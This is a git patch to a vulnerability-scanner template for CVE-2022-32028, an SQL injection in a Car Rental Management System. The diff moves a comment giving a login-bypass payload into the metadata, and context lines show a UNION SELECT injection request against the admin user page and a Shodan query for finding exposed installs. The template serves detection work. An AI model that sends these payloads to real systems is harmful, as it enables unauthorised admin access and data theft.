From 079f21a07eae4568d6d579f62d171a32affbaa76 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 2 Aug 2022 14:47:04 +0530
Subject: [PATCH] Update CVE-2022-32028.yaml

---
 cves/2022/CVE-2022-32028.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-32028.yaml b/cves/2022/CVE-2022-32028.yaml
index b8f72a277a..3df3b33d91 100644
--- a/cves/2022/CVE-2022-32028.yaml
+++ b/cves/2022/CVE-2022-32028.yaml
@@ -12,6 +12,7 @@ info:
   metadata:
     verified: true
     shodan-query: http.html:"Car Rental Management System"
+    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
   tags: cve,cve2022,carrental,cms,sqli,authenticated
 
 variables:
@@ -19,7 +20,6 @@ variables:
 
 requests:
   - raw:
-# Login bypass possible using a payload: admin'+or+'1'%3D'1' in username.
       - |
         POST /admin/ajax.php?action=login HTTP/1.1
         Host: {{Hostname}}
@@ -31,6 +31,7 @@ requests:
         GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1
         Host: {{Hostname}}
 
+    skip-variables-check: true
     redirects: true
     max-redirects: 2
     cookie-reuse: true